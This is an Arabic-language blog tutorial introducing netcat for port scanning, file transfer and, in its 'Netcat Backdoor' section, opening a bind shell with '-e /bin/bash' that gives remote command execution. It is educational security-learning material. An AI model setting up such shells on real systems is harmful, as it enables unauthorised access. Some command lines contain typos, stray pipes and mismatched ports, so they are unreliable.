تعرف على أداة netcat التي يستخدمها الباحثين الأمنيين و عمل إتصال بين 2 machine - Programmer Tech

Programmer Tech

تعلم البرمجة - علوم الكمبيوتر - أمن المعلومات - القرصنة الأخلاقية

إعلان اعلى المقالة

الخميس، 3 يونيو 2021

تعرف على أداة netcat التي يستخدمها الباحثين الأمنيين و عمل إتصال بين 2 machine


أداة Netcat على كالي لينكس

لهذه الأداة العديد من الإستخدامات المُهمة و الخطيرة و نستطيع إستخدامها في كثير من الأمور فهي تقوم بإرسال و إستقبال عبر بروتوكولات TCP & UDP و تُعَد هذه الأداة من أهم ادوات مختبرين الإختراق TOP 10 Network Security حيث يُمكنك معرفة المنافذ المفتوحة داخل machine لكنها أضعف بكثير من أداه Nmap.

فحص المنافذ المفتوحة في السيرفر Netcat Machine Port Scan

الشكل العام للأمر لعمل هذه الأداة و سوف أقوم بتجريبها على الجهاز الخاص بي في الشبكة و سيكون الأمر بالشكل الآتي
netcat -v -w5 IP Address -z Port Range | netcat -v -w1 192.168.1.3 10-100

البراهين Arguments التي قُمنا بإستخدامها

1 - الأول v - : لجعل الأداه تعمل بشكل Verbose Mode لرؤية ماذا يحدث خلف الكواليس و الإخراج output و رؤية المنافذ المفتوحة على الشاشة.

2 - الثاني w - : لتحديد Time Out لكل إتصال و في حالتنا قُمنا بتحديد 5 ثواني فقط.

3 - الثالث z -: نستخدم هذا الـ Argument في فحص المنافذ و كما يُمكننا فحص أكثر من مجموعة منافذ و سيكون الشكل كما يلي

natcat -v -w5 192.168.1.3 -z 1-50 100-300


نقل الملفات بين جهازين Netcat Transfer Files Between Two Machine

من مميزات أداة netcat أنها تستطيع نقل البيانات بين جهازين كما يُمكن نقل أي نوع من أنواع الملفات.

netcat -l -v -p 4444 <filename | netcat -l -v -p 4444 <kaissar.text


المعطيات المستخدمة

الـ l- إختصاراً للمصطلح listening و تعني أن أجعل الجهاز قابل للإتصال من جهة أخرى, هُنا تكون في وضع التنصت على هذا المنفذ.

الـ v- كما قلنا في الأعلى تعمل الأداة في وضع Verbose Mode لإخراج الأشياء التي تحصل خلف الكواليس output على الشاشة.

الـ p- تحديد منفذ الإتصال المطلوب.

الـ >- أما بالنسبة لهذه الإشارة تقوم بإعادة توجيه البيانات data المطلوبة و نستخدمها في نقل الملفات.

netcat -l -v -p 4444 <kaissar.text

في المثال السابق قُمنا بإستخدام أداة netcat في نقل ملف بإسم kaissar.text و قُمنا بإستخدام l لوضع التنصت listening و v لوضع verbose mode و p لتحديد منفذ الإتصال المطلوب و > لتوجيه الداتا من الجهاز و معنى هذا أي شخص سيقوم بالإتصال سيقوم بتحميل هذا الملف.

المستقبل recev

netcat -v -n 192.168.1.3 4444 > kaissar.text


و هُنا قُمنا بإستقبال الملف بعكس الإشارة الأُخرى < بالإضافة إلى Argument (n) و هنا لا نريده أن يبحث عن dns حتى لا يأخذ وقت في الإتصال.

Netcat Backdoor

يُعتَبَر خطر إستخدام Netcat هو backdoor حيث تتميز تلك الأداة في إرسال البيانات لبرامج التنفيذ على الحاسوب مثل cmd.exe في نظام الويندوز و /bin/bash في نظام لينكس مما يجعلك تستطيع تنفيذ أوامر في النظام بشكل كامل و تستطيع عمل Remote Shell على الحاسوب.

netcat -l -v -n -p 4444 -e /bin/bash


المُعطيات المُستخدمة

الـ e- تعني filename execute التي من خلالها تستطيع exec ملف مثل cmd.exe أو /bin/bash و سنقوم بالإتصال عليه من خلال هذا الأمر.

netcat -v -n 192.168.1.3 4444


و نستطيع الآن تنفيذ الأوامر على السيرفر أو
machine.

Netcat Arguments ShortHand

لأداة Netcat إختصارات مثل أي أداة اخرى و يُمكن كتابة الإختصار بالشكل

nc -lvnp 4444 | nc -vn 192.168.1.3 444


لقد وضعنا لكم كتاب يشرح لكم هذه الأداة و التوسع في شرحها اكثر, يمكنكم تحميل هذا الكتاب من مكتبتنا من الضغط على صورة الكتاب للتوجه للمكتبة.

هناك تعليقان (2):

  1. كفو خويا احمد، شرح في قمة الروعة خصوصاً الكتاب بالنهاية مفيد جدا جدا، شكرا الك حبيبي 😘😘😘😘😘.

    ردحذف

facebook

نموذج الاتصال

الاسم

بريد إلكتروني *

رسالة *